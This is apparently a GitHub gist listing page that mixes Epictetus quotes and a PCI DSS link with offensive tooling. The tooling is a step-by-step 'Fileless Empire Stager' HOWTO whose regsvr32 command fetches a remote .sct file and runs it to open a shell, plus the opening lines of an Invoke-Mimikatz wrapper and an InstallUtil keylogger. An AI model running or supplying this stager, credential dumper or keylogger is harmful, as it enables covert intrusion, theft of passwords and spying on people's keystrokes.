Skip to content

Instantly share code, notes, and snippets.

@gonsalu
gonsalu / epictetus.adoc
Created April 17, 2016 21:41 — forked from dahu/epictetus.adoc
Epictetus quotes

Epictetus

Philosophy is a way of life and not just a theoretical discipline.

Epictetus (55 — 135 AD) was a Greek slave of Rome. He became a great Stoic philosopher and teacher, and was eventually freed.

Although he was a fatalist, he believed that individuals are responsible for their own actions, which they can examine and control through rigorous self-discipline.

@gonsalu
gonsalu / HOWTO
Created April 17, 2016 21:04
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Wait for Shell...
@gonsalu
gonsalu / Invoke-MimikatzSharp.cs.ps1
Created December 22, 2015 15:52
Invoke-Mimikatz.cs.ps1 Invokes x86 or x64 Mimiktaz Inside of PowerShell Process
$Source = @"
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
@gonsalu
gonsalu / iukl.cs
Created October 9, 2015 08:33
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
@gonsalu
gonsalu / pci_dss.md
Last active August 29, 2015 14:26 — forked from diyan/pci_dss.md
PCI DSS. Useful resources